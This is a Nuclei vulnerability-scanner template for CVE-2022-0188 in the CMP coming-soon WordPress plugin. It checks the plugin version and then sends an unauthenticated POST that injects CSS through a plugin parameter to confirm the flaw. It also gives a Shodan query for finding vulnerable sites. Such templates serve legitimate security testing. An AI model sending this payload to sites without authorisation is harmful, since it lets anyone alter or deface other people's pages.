id: CVE-2022-0188

info:
  name: CMP WordPress < 4.0.19 - Broken Access Control
  author: pussycat0x
  severity: medium
  description: |
    CMP WordPress plugin < 4.0.19 contains an arbitrary page layout change caused by insufficient access control in the coming soon page feature, letting unauthenticated users modify the layout, exploit requires no authentication.
  reference:
    - https://wpscan.com/vulnerability/50b6f770-6f53-41ef-b2f3-2a58e9afd332/
  impact: Unauthenticated users can alter the coming soon page layout, potentially misleading visitors or causing defacement.
  remediation: Update to version 4.0.19 or later.
  metadata:
    verified: true
    max-request: 3
    shodan-query: html:"wp-content/plugins/cmp-coming-soon-maintenance"
  tags: cve,cve2022,wp-scan,wordpress,wp-plugin,cmp,intrusive

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/cmp-coming-soon-maintenance/readme.txt"

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - compare_versions(version, '< 4.0.19')
        condition: and
        internal: true

    extractors:
      - type: regex
        part: body
        name: version
        group: 1
        regex:
          - 'Stable tag: ([0-9.]+)'
        internal: true

  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        niteoCS_footer_background_opacity_hardwork=0);body{background:url({{randstr}});}div{color:red
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "contains_all(body_2, '{{randstr}}','cmp-coming-soon-maintenance')"
          - "contains_any(body_2, 'niteoCS','cmp-theme','coming-soon')"
          - "status_code == 200"
        condition: and

    extractors:
      - type: regex
        name: injected-css
        part: body_2
        group: 1
        regex:
          - 'background:url\(([a-zA-Z0-9]+)\)'
# digest: 4a0a0047304502203505af93572a3093ccf440dd1645e78d00042cc9cef657f25d664841fa2ca4ac022100a819d7f367cdf8e4f312afe56f45f9593ce46b8a29d3068fa1abb7bf774127bc:922c64590222798bb761d5b6d8e72950